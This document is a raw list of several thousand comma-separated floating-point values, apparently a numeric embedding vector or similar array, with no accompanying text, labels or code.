-0.03727373108267784, 0.009815515018999577, -0.01293897069990635, 0.008576519787311554, 0.00002112714537361171, -0.004202939569950104, 0.018814925104379654, 0.023652201518416405, 0.003459171624854207, 0.04561283811926842, 0.013562178239226341, 0.011885453946888447, 0.014066679403185844, 0.00015499035362154245, -0.01716787740588188, 0.008361364714801311, 0.01654466986656189, 0.015758242458105087, 0.0027395153883844614, 0.015832433477044106, -0.0030028948094695807, 0.008287173695862293, -0.001831598812714219, -0.012805426493287086, 0.020491650328040123, -0.01581759564578533, 0.010920966044068336, -0.00802750326693058, 0.022925125434994698, -0.011648041196167469, -0.006309974007308483, -0.002209047321230173, -0.00021190903498791158, 0.0008230602252297103, -0.01257543358951807, -0.0003563502978067845, 0.007945893332362175, 0.016618860885500908, -0.026234060525894165, -0.029261067509651184, 0.014556341804564, -0.008999410085380077, 0.0024186379741877317, -0.009882287122309208, 0.01728658378124237, 0.0018492193194106221, 0.0035815872251987457, 0.012953809462487698, 0.016040168702602386, 0.006755121983587742, 0.010253244079649448, -0.024720557034015656, -0.01032001618295908, 0.0021181630436331034, -0.014578599482774734, 0.01719755493104458, -0.007804929744452238, -0.005486450158059597, -0.0027172579430043697, -0.004666635766625404, -0.0026820171624422073, -0.015743402764201164, -0.004377289209514856, -0.016307257115840912, -0.01691562682390213, 0.0007326395716518164, 0.016455641016364098, -0.011840938590466976, 0.00759719405323267, 0.014801173470914364, 0.015461476519703865, -0.01290187519043684, -0.005816601682454348, -0.002641211962327361, 0.005375163163989782, -0.00685899006202817, 0.020001986995339394, -0.027465635910630226, 0.029632024466991425, 0.006551095750182867, 0.01046839915215969, 0.008865865878760815, 0.003010313957929611, -0.008828770369291306, 0.0005179483559913933, -0.015491153113543987, 0.04107232764363289, -0.009095858782529831, 0.012723815627396107, -0.007122369017452002, 0.002392670838162303, -0.0065102907828986645, -0.015446638688445091, -0.02452765963971615, -0.008813931606709957, 0.009125535376369953, -0.009986154735088348, -0.0034777193795889616, -0.006309974007308483, -0.0037744848523288965, -0.004692602436989546, 0.020283913239836693, -0.003954398911446333, 0.008183305151760578, 0.009674551896750927, 0.008687806315720081, 0.003652069019153714, 0.012516080401837826, 0.00028007233049720526, 0.021649034693837166, 0.017954306676983833, 0.017227230593562126, 0.00553096504881978, 0.029186876490712166, 0.025136027485132217, -0.0054901596158742905, 0.007311556953936815, -0.021100018173456192, -0.0024779909290373325, -0.011225150898098946, 0.011106444522738457, -0.013844105415046215, -0.005657090339809656, 0.0054901596158742905, 0.015097939409315586, -0.025121189653873444, -0.013643788173794746, -0.0010609362507238984, -0.002199773443862796, 0.00888812355697155, -0.0035834419541060925, 0.006280297413468361, -0.0062654591165483, -0.002752498956397176, -0.018414292484521866, 0.0031104721128940582, 0.007656546775251627, 0.00024413589562755078, 0.00359457079321146, -0.030774571001529694, 0.0038542405236512423, 0.004941143561154604, 0.01064645778387785, -0.0048817903734743595, 0.006621577776968479, -0.020283913239836693, -0.0010275501990690827, -0.010572266764938831, -0.005445644725114107, -0.01768721640110016, -0.011418048292398453, -0.018859440460801125, 0.031308747828006744, -0.012375116348266602, 0.00913295429199934, -0.017064008861780167, 0.00788654014468193, -0.008613615296781063, -0.012961228378117085, 0.019838765263557434, 0.01032001618295908, -0.018206557258963585, 0.003720696084201336, -0.008131371811032295, -0.015580182895064354, 0.02170838788151741, -0.00595014588907361, 0.013154125772416592, -0.0023629944771528244, -0.014682467095553875, -0.01152933482080698, 0.01798398233950138, 0.0054122586734592915, 0.002260981360450387, -0.0028489476535469294, 0.015876948833465576, -0.00885102804750204, -0.01429667230695486, 0.025892779231071472, 0.027139194309711456, 0.0226135216653347, 0.01460085716098547, 0.0018529288936406374, 0.006573353428393602, 0.0014170546783134341, -0.029424287378787994, 0.0026041162200272083, 0.0026337928138673306, -0.007051887456327677, 0.01609952189028263, -0.016322096809744835, 0.011907710693776608, 0.0012158106546849012, -0.014170547015964985, 0.0028211260214447975, -0.002620809245854616, 0.010958061553537846, 0.012849940918385983, -0.019067175686359406, -0.01675240509212017, 0.005731281358748674, -0.012471565045416355, 0.011633203364908695, -0.031071335077285767, -0.01072806864976883, -0.014571180567145348, -0.0021125986240804195, 0.01986844278872013, -0.022954802960157394, 0.0024575884453952312, -0.010535171255469322, -0.015105358324944973, -0.022791581228375435, 0.0010386788053438067, -0.014215062372386456, 0.00917746964842081, -0.006881247274577618, 0.010817098431289196, -0.009370367042720318, -0.0117148132994771, -0.013465729542076588, 0.0035203793086111546, 0.033564165234565735, -0.011173216626048088, -0.002496538683772087, -0.016366610303521156, -0.004826147109270096, -0.013109610415995121, -0.0007266114698722959, 0.013265412300825119, -0.01982392743229866, 0.0014309656107798219, 0.010394207201898098, -0.004892919212579727, -0.010572266764938831, -0.03145712986588478, 0.012619948014616966, 0.018696218729019165, -0.013146706856787205, -0.006810765713453293, 0.011113863438367844, -0.008613615296781063, 0.00800524652004242, -0.016485316678881645, 0.00641013216227293, 0.008198143914341927, 0.003746662987396121, 0.03641311451792717, 0.00999357458204031, 0.016188552603125572, -0.002272109966725111, 0.017642702907323837, -0.009644875302910805, -0.003438768908381462, 0.0053491960279643536, -0.013688303530216217, 0.0008703572093509138, -0.01271639671176672, -0.0014875364722684026, 0.01756851002573967, -0.010453560389578342, 0.013962811790406704, 0.005475321318954229, -0.0021088889334350824, 0.011225150898098946, 0.013028000481426716, 0.008902961388230324, 0.02256900817155838, -0.003466590540483594, 0.01568405143916607, 0.0020495359785854816, -0.007203979883342981, -0.016396287828683853, -0.01580275595188141, -0.003090069629251957, 0.00999357458204031, 0.032169368118047714, 0.007790091447532177, -0.011662879958748817, 0.009459396824240685, 0.004829856567084789, -0.00764912785962224, -0.01130676083266735, 0.015120196156203747, 0.030329423025250435, 0.019556839019060135, 0.0007548969588242471, 0.014244738034904003, -0.006139333825558424, -0.018814925104379654, -0.010349692776799202, -0.002908300841227174, -0.0037244055420160294, -0.005382582079619169, -0.016974980011582375, 0.0010266227182000875, -0.00004677532706409693, -0.008316850289702415, -0.008932637982070446, -0.0082129817456007, 0.0029583799187093973, -0.008710063993930817, -0.0010980318766087294, -0.011047091335058212, -0.00455534877255559, -0.012093189172446728, 0.02605600096285343, 0.0054345158860087395, 0.013376699760556221, 0.00004651449489756487, -0.004091652575880289, -0.04938175901770592, -0.01028292067348957, 0.009221984073519707, -0.00390988402068615, 0.0027543536853045225, 0.00475195562466979, -0.010453560389578342, -0.011032253503799438, 0.004154715221375227, -0.001511648646555841, 0.01647047884762287, -0.007363491225987673, 0.01040162704885006, -0.0005624631303362548, -0.002214611740782857, 0.036591172218322754, -0.017420127987861633, -0.00858393870294094, -0.007192851044237614, -0.00470002181828022, 0.02564052864909172, 0.008761998265981674, -0.029023654758930206, 0.026679208502173424, -0.008917800150811672, -0.01382184773683548, 0.010846775025129318, -0.009926802478730679, -0.025581175461411476, 0.006039175670593977, -0.0020940506365150213, -0.011277084238827229, -0.006261749658733606, -0.025610852986574173, 0.006272878497838974, 0.01519438810646534, 0.01924523524940014, 0.029661700129508972, -0.010824517346918583, -0.00002406871681159828, 0.007307847496122122, 0.0029991851188242435, -0.02690178155899048, -0.015023747459053993, 0.001984618604183197, 0.04656248912215233, 0.011039672419428825, -0.011848358437418938, -0.005230490118265152, -0.005182265304028988, 0.002424202160909772, -0.004833566024899483, 0.0037336794193834066, -0.0323474258184433, 0.011863196268677711, -0.010935804806649685, 0.010164214298129082, -0.02187160961329937, -0.004596153739839792, 0.001448586001060903, -0.0019475228618830442, -0.013332185335457325, -0.010705810971558094, 0.006792217958718538, -0.019809089601039886, 0.0000252134650509106, 0.003008458996191621, 0.026234060525894165, 0.01540212333202362, 0.013480567373335361, 0.008984572254121304, -0.004121329169720411, -0.014726982451975346, -0.0084800710901618, -0.012130284681916237, -0.014445055276155472, 0.02256900817155838, 0.017420127987861633, -0.017375612631440163, 0.0037540821358561516, -0.01183351967483759, 0.01584727130830288, -0.012664462439715862, 0.01175190880894661, -0.00819072499871254, 0.020387781783938408, 0.0036761811934411526, -0.004685183521360159, 0.015535667538642883, 0.018206557258963585, -0.0021144533529877663, -0.0047037312760949135, -0.00006497539288830012, 0.023488979786634445, -0.024809585884213448, 0.00368545507080853, 0.013569597154855728, -0.007760414853692055, 0.005156298633664846, -0.012924132868647575, -0.004247454460710287, 0.0021960637532174587, -0.009592941030859947, -0.0010906128445640206, -0.007879121229052544, 0.000741449766792357, -0.011091606691479683, -0.014496988616883755, -0.004644378088414669, 0.017004655674099922, 0.017909791320562363, 0.0064323898404836655, 0.014548922888934612, 0.0172420684248209, 0.008257497102022171, -0.023518657311797142, 0.010082604363560677, -0.01957167685031891, 0.014637952670454979, 0.018117526546120644, 0.002038407139480114, 0.000787819386459887, 0.013361860997974873, 0.032050661742687225, 0.005430806428194046, 0.010446141473948956, -0.006232073064893484, -0.007619451265782118, -0.012924132868647575, -0.010483236983418465, -0.002145984675735235, 0.010052927769720554, -0.01921555958688259, 0.00687011843547225, -0.007430263329297304, -0.010379369370639324, 0.0025577466003596783, 0.008962314575910568, -0.007678804453462362, -0.0065548052079975605, 0.008049760945141315, -0.01349540613591671, -0.020372943952679634, -0.018859440460801125, 0.032050661742687225, -0.007400586735457182, -0.010446141473948956, 0.017805922776460648, 0.007656546775251627, -0.0016563218086957932, -0.014986651949584484, 0.006662382744252682, -0.019883280619978905, -0.00373182469047606, -0.0026745980139821768, 0.00012577751476783305, 0.007174303289502859, -0.0038134350907057524, 0.017212392762303352, 0.013577016070485115, -0.005300971679389477, 0.009489073418080807, -0.0169601421803236, -0.0037819037679582834, -0.015142453834414482, 0.008865865878760815, 0.015476315282285213, 0.018651705235242844, -0.01773173175752163, -0.0009626327082514763, -0.00843555573374033, -0.004748246166855097, -0.0038950457237660885, -0.013888619840145111, 0.000517020933330059, 0.004996787291020155, -0.0009454759419895709, -0.006881247274577618, 0.02064003236591816, -0.005430806428194046, -0.0020717934239655733, -0.014170547015964985, -0.025952132418751717, -0.04941143840551376, 0.013606692664325237, 0.010987738147377968, 0.007745576556771994, -0.025506984442472458, -0.003299660049378872, -0.01728658378124237, -0.011002576909959316, 0.010119699873030186, 0.012879617512226105, -0.007385748438537121, -0.007422844413667917, -0.018369777128100395, 0.00943713914602995, -0.014452474191784859, 0.029335258528590202, 0.04430707171559334, 0.0028804789762943983, 0.003637230722233653, -0.013280251063406467, 0.0082129817456007, 0.0011898437514901161, 0.004125038627535105, -0.0010414610151201487, 0.006591901183128357, 0.02526957169175148, 0.0067662508226931095, 0.011358695104718208, -0.00585740664973855, -0.0092961760237813, -0.005315809976309538, 0.016025330871343613, 0.004900338593870401, 0.009325852617621422, -0.003683600341901183, -0.013577016070485115, 0.01183351967483759, 0.003027006983757019, -0.020165208727121353, -0.019304588437080383, -0.015609859488904476, 0.008368783630430698, 0.015758242458105087, -0.002643066691234708, -0.005616284906864166, -0.00029073734185658395, 0.011358695104718208, -0.005360324867069721, 0.019111691042780876, -0.006959148216992617, -0.006658673286437988, -0.011091606691479683, -0.0023407370317727327, 0.006191267631947994, 0.005408549215644598, 0.02138194628059864, -0.02482442371547222, 0.008977153338491917, -0.0022498525213450193, 0.0016600313829258084, -0.019794251769781113, -0.018503321334719658, 0.008747159503400326, -0.0053343577310442924, 0.011892872862517834, -0.02482442371547222, -0.002214611740782857, -0.02789594605565071, 0.0017184570897370577, 0.004918886348605156, 0.010104861110448837, -0.007901377975940704, 0.03641311451792717, -0.008161048404872417, -0.010386788286268711, -0.010453560389578342, -0.03439510986208916, -0.01798398233950138, -0.025610852986574173, 0.0017434966284781694, 0.013918296433985233, -0.01249382272362709, -0.035611845552921295, -0.01961619220674038, 0.00036979748983867466, -0.0022591263987123966, -0.0055680605582892895, -0.0029045911505818367, -0.022672874853014946, -0.029676537960767746, 0.00409536249935627, -0.0010535171022638679, 0.006013208534568548, -0.015416962094604969, 0.03682858496904373, 0.0012195202289149165, -0.007259623147547245, 0.032377105206251144, -0.00382456392981112, -0.01282026432454586, 0.0032180496491491795, -0.0021608229726552963, -0.012775749899446964, 0.000790601538028568, -0.02805916778743267, -0.014474731869995594, 0.015179549343883991, -0.01822139509022236, -0.009926802478730679, -0.007842025719583035, 0.012827684171497822, -0.008969733491539955, -0.016826597973704338, 0.0001508170971646905, 0.004184391815215349, 0.0052712950855493546, 0.014630533754825592, 0.0016767244087532163, 0.011967063881456852, -0.004533091094344854, -0.006810765713453293, -0.02145613729953766, -0.006547386292368174, -0.011551592499017715, -0.0011740780901163816, 0.0113215995952487, 0.0033794157207012177, -0.013109610415995121, -0.00839846022427082, 0.03071521781384945, -0.0014560051495209336, -0.0038134350907057524, 0.019423294812440872, 0.018770409747958183, -0.0032124852295964956, -0.0034925576765090227, 0.018903955817222595, -0.0009839626727625728, -0.008287173695862293, 0.012516080401837826, 0.0021385655272752047, -0.002225740347057581, -0.004481157287955284, 0.0024408951867371798, 0.00691092386841774, -0.04611733928322792, -0.03350481018424034, -0.03415769711136818, -0.012234153226017952, -0.0250618364661932, 0.006792217958718538, -0.010156795382499695, 0.017924629151821136, 0.011247407644987106, -0.001558018266223371, 0.010995157063007355, 0.013873782008886337, 0.01814720407128334, -0.009904544800519943, 0.020951636135578156, 0.002528070006519556, 0.0105054946616292, 0.007048177998512983, -0.011870615184307098, -0.014675048179924488, 0.014949556440114975, -0.01478633563965559, -0.008658129721879959, -0.004955981858074665, -0.01540212333202362, 0.005627413745969534, 0.006480614189058542, -0.009014248847961426, 0.01875557191669941, -0.02568504400551319, -0.02326640672981739, -0.009118116460740566, -0.01716787740588188, 0.024319922551512718, 0.007170593831688166, 0.002913865027949214, 0.014934717677533627, -0.0035834419541060925, -0.019675545394420624, -0.0003153132274746895, 0.0119819026440382, 0.02645663358271122, -0.002021714113652706, -0.025506984442472458, 0.012004159390926361, -0.009971316903829575, 0.028890110552310944, 0.009244241751730442, 0.007011082023382187, -0.028148196637630463, -0.004570187069475651, 0.00021527083299588412, -0.0005235126591287553, -0.0010321871377527714, -0.0027061293367296457, 0.02457217313349247, 0.009392624720931053, -0.016856273636221886, 0.010164214298129082, 0.015491153113543987, 0.004139876924455166, 0.023192215710878372, 0.004918886348605156, -0.004418094642460346, -0.005534674506634474, 0.019734898582100868, 0.014556341804564, -0.01359927374869585, 0.002782175550237298, -0.0038802074268460274, -0.015186968259513378, -0.007931054569780827, -0.0017370048444718122, -0.00530468113720417, 0.007953312247991562, 0.006239492446184158, -0.025981809943914413, -0.00520081352442503, 0.006577062886208296, -0.0010702101280912757, 0.012694139033555984, -0.00728188082575798, 0.014608276076614857, -0.005861116573214531, 0.005790634546428919, 0.019022660329937935, -0.01822139509022236, 0.01020130980759859, 0.006284006871283054, 0.007066725753247738, -0.008836189284920692, 0.02010585553944111, -0.0204768106341362, -0.010483236983418465, -0.011277084238827229, 0.0005963129224255681, -0.0193787794560194, 0.0000015613510413459153, -0.03501831367611885, 0.026560502126812935, -0.01079484075307846, 0.00039112751255743206, -0.009229403920471668, -0.0113215995952487, 0.005330648273229599, 0.01810268871486187, -0.031516484916210175, -0.007849444635212421, -0.029498478397727013, 0.005178555846214294, 0.024601850658655167, 0.021085180342197418, -0.013094772584736347, 0.0047037312760949135, -0.00948165450245142, 0.0009505766211077571, 0.0013475003652274609, -0.004484866745769978, 0.0014986651949584484, -0.00401375163346529, -0.015951139852404594, -0.03050748072564602, -0.02150065265595913, 0.00271911290474236, -0.02429024688899517, 0.015416962094604969, 0.01368088461458683, -0.0479276105761528, -0.0002675525320228189, -0.003976656123995781, -0.0036706167738884687, 0.0017935758223757148, -0.013695722445845604, -0.03623505309224129, -0.003704003058373928, 0.02687210589647293, -0.006621577776968479, 0.002583713736385107, -0.0005429878947325051, 0.001021985779516399, 0.006131914909929037, -0.026842428371310234, -0.013332185335457325, -0.002720967633649707, 0.0110545102506876, -0.015135034918785095, -0.000013939858035882935, 0.006120786070823669, 0.006606739480048418, -0.014571180567145348, 0.009103278629481792, 0.008346526883542538, 0.0269166212528944, -0.0077084810473024845, -0.004970820154994726, -0.018399454653263092, 0.0042845504358410835, 0.0029416868928819895, -0.01719755493104458, 0.00663641607388854, -0.025536661967635155, -0.001805631909519434, -0.009489073418080807, 0.0016377739375457168, -0.010141956619918346, 0.014912460930645466, 0.014452474191784859, -0.002151549095287919, -0.005631123203784227, -0.015179549343883991, 0.023444466292858124, 0.010038089007139206, -0.006309974007308483, -0.007244784850627184, 0.019319426268339157, 0.025937294587492943, 0.010750326327979565, 0.0009672697051428258, -0.008198143914341927, -0.010972900316119194, -0.005734991282224655, -0.012508660554885864, 0.0046814740635454655, 0.00003170520722051151, 0.011581269092857838, 0.017316259443759918, -0.0054679024033248425, 0.007626870181411505, 0.009095858782529831, -0.009207146242260933, 0.006324812304228544, -0.009207146242260933, 0.010972900316119194, 0.008472652174532413, -0.004262292757630348, -0.0005657090223394334, 0.004139876924455166, -0.002917574718594551, -0.01933426409959793, -0.002338882302865386, -0.007738157641142607, 0.001143474131822586, -0.000032545656722504646, -0.0019197011133655906, 0.00186591234523803, -0.005289842840284109, 0.01663370057940483, 0.017434965819120407, -0.011677717790007591, 0.0009417664259672165, 0.00950391124933958, 0.005760957952588797, 0.0015598731115460396, 0.020046502351760864, 0.01994263380765915, 0.024186378344893456, 0.014356025494635105, 0.015713727101683617, -0.0028359643183648586, 0.014341187663376331, -0.015127615071833134, -0.005734991282224655, -0.001820470206439495, -0.0037763395812362432, -0.009140374138951302, -0.005423387512564659, 0.011588688008487225, -0.0011156523833051324, 0.01480859238654375, -0.003095633815973997, -0.020283913239836693, 0.013881200924515724, 0.014496988616883755, -0.0027914494276046753, 0.0010562993120402098, -0.016856273636221886, 0.004748246166855097, -0.01752399653196335, 0.0044700284488499165, -0.002654195297509432, -0.016618860885500908, -0.004169553518295288, 0.010431303642690182, -0.009355529211461544, -0.0030362808611243963, -0.009221984073519707, -0.009815515018999577, -0.00650287140160799, 0.009733905084431171, 0.01322831679135561, -0.0036780359223484993, -0.003913593478500843, -0.00027242134092375636, 0.004551639314740896, 0.007137207314372063, 0.0010785566410049796, -0.009578103199601173, -0.0038431116845458746, 0.023622523993253708, -0.008554262109100819, -0.012842522002756596, 0.0007344943005591631, -0.004963401239365339, 0.0008569100755266845, -0.011603526771068573, -0.001287219813093543, 0.013962811790406704, 0.0028378190472722054, 0.02838560938835144, 0.003423930611461401, 0.008546843193471432, -0.013651208020746708, 0.013695722445845604, -0.0011991176288574934, -0.01492729876190424, -0.0113215995952487, 0.004829856567084789, 0.0029880565125495195, -0.0012881472939625382, -0.002010585507377982, -0.013999907299876213, 0.006469485349953175, 0.013473148457705975, -0.027094678953289986, 0.01480859238654375, -0.00764912785962224, 0.00571273360401392, 0.001592331798747182, 0.009474234655499458, 0.009184888564050198, 0.001393869868479669, 0.02023939974606037, -0.01580275595188141, -0.0027562084142118692, 0.00009528951341053471, 0.012315763160586357, -0.015505990944802761, -0.0033886898308992386, -0.010023251175880432, 0.013421214185655117, -0.027005650103092194, 0.0038171447813510895, 0.02694629691541195, -0.02391928993165493, -0.02543279342353344, -0.026189545169472694, -0.007586065214127302, 0.011343857273459435, 0.0019401037134230137, 0.031190041452646255, -0.010416464880108833, 0.007300428580492735, 0.0050932359881699085, -0.008509747684001923, 0.01046839915215969, 0.00456647714599967, 0.005749829113483429, 0.01032001618295908, -0.003950688987970352, -0.0014726981753483415, 0.0013716125395148993, -0.009971316903829575, -0.006117076613008976, -0.0010303322924301028, 0.031160365790128708, 0.014912460930645466, 0.0072633326053619385, -0.01511277724057436, -0.021619359031319618, -0.012849940918385983, -0.004451480694115162, -0.01128450408577919, -0.007322685793042183, 0.02715403214097023, 0.008324269205331802, 0.005571770016103983, -0.006224654149264097, -0.0005346413818188012, 0.019838765263557434, -0.0012695994228124619, -0.005742410197854042, -0.004870662000030279, -0.017064008861780167, 0.0020235690753906965, 0.021515490487217903, 0.00014397758059203625, 0.0403897687792778, -0.009934221394360065, -0.024483144283294678, 0.003205066081136465, -0.03311901539564133, -0.011128702200949192, 0.00770106166601181, -0.006769960280507803, -0.012226734310388565, -0.00510807428508997, -0.025046998634934425, 0.024750232696533203, 0.006777379661798477, -0.024809585884213448, -0.004347613081336021, -0.0022016281727701426, -0.0025874231941998005, 0.004087943118065596, 0.004636959172785282, 0.0036965839099138975, 0.008012665435671806, -0.0011536754900589585, -0.031011981889605522, 0.008049760945141315, 0.00977100059390068, -0.0029101555701345205, 0.014504408463835716, -0.019393617287278175, 0.00013690622290596366, 0.010268081910908222, 0.005953855346888304, -0.00520081352442503, -0.013398957438766956, -0.020773576572537422, 0.018607189878821373, 0.0009691244340501726, 0.00022013964189682156, 0.015372446738183498, -0.00654367683455348, 0.018236232921481133, 0.019363941624760628, 0.0019197011133655906, -0.006680930498987436, 0.002589277923107147, -0.03213969245553017, 0.0014931008918210864, -0.00046717363875359297, -0.0038690788205713034, 0.004763084463775158, -0.010290339589118958, -0.026263736188411713, 0.0016804339829832315, 0.008428136818110943, 0.012835103087127209, 0.012501241639256477, 0.012864779680967331, -0.009882287122309208, -0.0247799102216959, 0.005649670958518982, -0.01497181411832571, -0.016767244786024094, -0.007445101626217365, 0.01492729876190424, 0.010891289450228214, 0.007352362386882305, 0.0006125423242338002, 0.007485907059162855, -0.00833168812096119, -0.008606196381151676, 0.026649530977010727, -0.010297758504748344, 0.009852610528469086, -0.010601943358778954, 0.0084800710901618, 0.009221984073519707, -0.009140374138951302, -0.00589821208268404, 0.0026078259106725454, -0.010906128212809563, -0.010965481400489807, -0.014044421724975109, -0.007422844413667917, 0.0026393572334200144, -0.0004537264467217028, 0.0033905445598065853, -0.012708977796137333, -0.005263876169919968, 0.018992984667420387, 0.008969733491539955, 0.023236729204654694, 0.016351772472262383, 0.00907360203564167, -0.009837772697210312, 0.002746934536844492, 0.01782076060771942, 0.004006332717835903, -0.0035723133478313684, 0.006773669738322496, -0.000797556946054101, 0.019423294812440872, -0.007259623147547245, 0.017969144508242607, 0.004599863663315773, -0.002496538683772087, -0.012968647293746471, 0.006235782522708178, -0.011596107855439186, -0.003268128726631403, 0.0010562993120402098, 0.012197057716548443, 0.013955391943454742, 0.0070073725655674934, 0.017182715237140656, 0.006469485349953175, -0.0013558468781411648, 0.02334059774875641, 0.013628950342535973, -0.0029620896093547344, -0.005887083243578672, -0.009303594939410686, 0.008821351453661919, 0.007070435211062431, -0.005100654903799295, -0.015995653346180916, 0.023414788767695427, -0.007196560502052307, -0.013999907299876213, -0.006395293865352869, -0.002537344116717577, -0.018191717565059662, 0.010943223722279072, -0.021085180342197418, 0.018117526546120644, 0.02498764544725418, 0.02199031412601471, -0.004967110697180033, -0.0070778545923531055, -0.0054827407002449036, 0.012211895547807217, 0.002886043395847082, -0.02420121803879738, -0.01581759564578533, -0.03136810287833214, -0.009036505594849586, 0.0005304681253619492, -0.012597690336406231, -0.013985068537294865, 0.0017434966284781694, 0.014482150785624981, -0.013710561208426952, -0.0011638767318800092, -0.02084776759147644, 0.02924622781574726, 0.020580679178237915, -0.00008108882320811972, 0.014140870422124863, 0.012516080401837826, -0.021322593092918396, 0.003485138528048992, -0.009348109364509583, 0.03148680552840233, 0.0013335894327610731, -0.006677221041172743, 0.000299547566100955, 0.02326640672981739, -0.009600359946489334, -0.0053121005184948444, 0.006977695971727371, -0.017479481175541878, 0.013658626936376095, 0.0026764527428895235, -0.0008337252656929195, -0.006992534268647432, 0.006165300961583853, -0.010527752339839935, 0.0231477003544569, 0.013502825051546097, 0.00465921638533473, 0.01064645778387785, -0.0006283079856075346, -0.0020254238042980433, 0.013065095990896225, -0.002997330389916897, 0.02301415614783764, -0.013295088894665241, 0.011774166487157345, -0.016811758279800415, -0.010045507922768593, -0.009288756176829338, -0.003210630500689149, -0.004336484242230654, 0.0280146524310112, -0.0012130285613238811, 0.02142646163702011, -0.010394207201898098, 0.002320334315299988, -0.002554037142544985, 0.008227820508182049, -0.029261067509651184, -0.013257993385195732, -0.002398235257714987, -0.006862699519842863, 0.017256906256079674, -0.0011119428090751171, 0.00931843277066946, -0.02538827806711197, -0.018073011189699173, -0.017998820170760155, 0.0031549870036542416, 0.004744536709040403, -0.004800179973244667, 0.008761998265981674, 0.03190227970480919, 0.029023654758930206, 0.009548426605761051, 0.013436052948236465, -0.003705857787281275, 0.0005476248916238546, -0.012538337148725986, -0.000905598106328398, -0.025180542841553688, -0.013109610415995121, 0.014393121004104614, 0.00770106166601181, 0.0068441517651081085, 0.0024167830124497414, 0.009459396824240685, -0.0005068196333013475, -0.002685726620256901, -0.005976113025099039, -0.0017499884124845266, -0.0015413252403959632, 0.01422990020364523, -0.004592444282025099, 0.0007836460717953742, 0.01658918522298336, -0.009600359946489334, -0.006413842085748911, 0.0002809997240547091, 0.022999316453933716, 0.00037744847941212356, 0.022465139627456665, -0.0027024198789149523, -0.0028990269638597965, 0.012256409972906113, 0.008287173695862293, -0.007489616516977549, -0.006577062886208296, 0.02150065265595913, 0.02059551700949669, 0.019274910911917686, 0.018933631479740143, 0.0046035731211304665, -0.009926802478730679, 0.015283416956663132, 0.013525082729756832, 0.0002668570086825639, 0.005594027694314718, 0.016767244786024094, -0.014430216513574123, 0.010995157063007355, -0.00884360820055008, 0.0161440372467041, 0.005675638094544411, -0.0026616144459694624, -0.00290273642167449, -0.013918296433985233, 0.018325261771678925, 0.03676922991871834, -0.004466318991035223, 0.0029936209321022034, -0.016455641016364098, -0.012568013742566109, -0.014860526658594608, -0.03006233274936676, 0.009570683352649212, -0.011032253503799438, 0.007990407757461071, 0.006250620819628239, 0.00020843131642322987, -0.020491650328040123, 0.00331820803694427, -0.0026912910398095846, -0.013955391943454742, 0.017138201743364334, 0.004766793921589851, -0.013777333311736584, -0.0013345167972147465, 0.013933135196566582, -0.017212392762303352, 0.010156795382499695, 0.004551639314740896, 0.003242161823436618, -0.0034257853403687477, -0.004154715221375227, -0.0059909513220191, -0.007916216738522053, 0.001995747210457921, -0.01106193009763956, 0.016885951161384583, -0.014912460930645466, -0.013502825051546097, -0.017227230593562126, -0.024928292259573936, -0.0007015719311311841, 0.0017759553156793118, -0.00019649114983621985, 0.015921462327241898, -0.022390948608517647, -0.003980365581810474, -0.013421214185655117, 0.011499658226966858, 0.015995653346180916, -0.0033571585081517696, -0.010535171255469322, -0.0021589682437479496, -0.023073509335517883, 0.000032835465390235186, 0.00024181742628570646, 0.006936891004443169, -0.009021667763590813, 0.009355529211461544, -0.008012665435671806, 0.01345089077949524, -0.027628857642412186, -0.002611535368487239, 0.03501831367611885, -0.01083193626254797, 0.021530328318476677, 0.015906624495983124, -0.004099071957170963, 0.01773173175752163, 0.0036242471542209387, 0.000577301427256316, -0.017553672194480896, 0.0014866091078147292, 0.0014309656107798219, 0.000793383689597249, 0.011967063881456852, -0.019601354375481606, -0.0012139559257775545, 0.0002698710304684937, -0.0032032113522291183, 0.007159464992582798, -0.004202939569950104, -0.014281834475696087, -0.00013574697368312627, 0.02003166265785694, 0.002209047321230173, 0.008494908921420574, 0.018948469310998917, 0.02575923502445221, 0.018162041902542114, 0.008198143914341927, -0.02040261961519718, 0.015743402764201164, -0.00026847992558032274, 0.011455143801867962, -0.01234543975442648, -0.02834109403192997, -0.03311901539564133, -0.00654367683455348, 0.009125535376369953, 0.0042845504358410835, -0.014311511069536209, 0.0038653691299259663, -0.004896628670394421, -0.020016824826598167, 0.020981311798095703, 0.003516669850796461, 0.005070978309959173, -0.006272878497838974, -0.022628361359238625, 0.02940944954752922, 0.0035259437281638384, -0.0033794157207012177, 0.026738561689853668, -0.017553672194480896, -0.021040664985775948, -0.03383125364780426, -0.025239896029233932, -0.0025614562910050154, -0.0018742588581517339, -0.02010585553944111, 0.0025929876137524843, -0.03813435137271881, -0.009578103199601173, 0.006261749658733606, 0.010164214298129082, 0.008821351453661919, 0.018978146836161613, 0.0009250733419321477, 0.007267042528837919, -0.016574347391724586, 0.028355931863188744, 0.005942726973444223, 0.009563264437019825, -0.02359284833073616, -0.0006695769261568785, 0.011803843080997467, -0.013666045852005482, -0.011677717790007591, 0.05398162454366684, 0.018117526546120644, 0.019022660329937935, 0.01261252909898758, 0.013287669979035854, 0.018622027710080147, -0.004944853018969297, -0.013807009905576706, -0.021738063544034958, 0.010171633213758469, 0.001264035003259778, -0.011358695104718208, 0.011217731982469559, -0.00433277478441596, -0.0011610945221036673, 0.013243155553936958, -0.0044700284488499165, -0.005275004543364048, -0.0025707301683723927, -0.02154516614973545, -0.01529825571924448, 0.003314498346298933, 0.00962261762470007, -0.0349886380136013, -0.010075184516608715, 0.010453560389578342, -0.012478984892368317, -0.007804929744452238, 0.007459939923137426, -0.0036168282385915518, 0.02219805121421814, -0.017256906256079674, -0.013332185335457325, 0.03406866639852524, 0.002058809855952859, 0.02305866964161396, 0.007626870181411505, 0.01109902560710907, -0.005961274728178978, -0.009036505594849586, -0.0006584482034668326, 0.009466815739870071, -0.00891038030385971, 0.0030455547384917736, 0.006855280604213476, -0.007537840865552425, 0.0031382939778268337, -0.006146753206849098, 0.02543279342353344, 0.005319519434124231, 0.017420127987861633, 0.0072336564771831036, -0.010453560389578342, 0.011662879958748817, 0.010498075745999813, -0.01647047884762287, -0.01761302538216114, -0.00047760677989572287, -0.0028211260214447975, -0.01572856493294239, -0.003809725632891059, -0.018978146836161613, -0.013020581565797329, 0.002704274607822299, -0.025566337630152702, -0.017746569588780403, 0.006380455568432808, 0.02433476224541664, -0.011729652062058449, 0.008361364714801311, 0.004010042175650597, 0.004299388732761145, -0.014771496877074242, 0.0017073283670470119, -0.01716787740588188, -0.017583349719643593, 0.007170593831688166, 0.004636959172785282, 0.007790091447532177, 0.007448811084032059, -0.010082604363560677, -0.027539826929569244, 0.007908797822892666, -0.002854512073099613, -0.0033423202112317085, 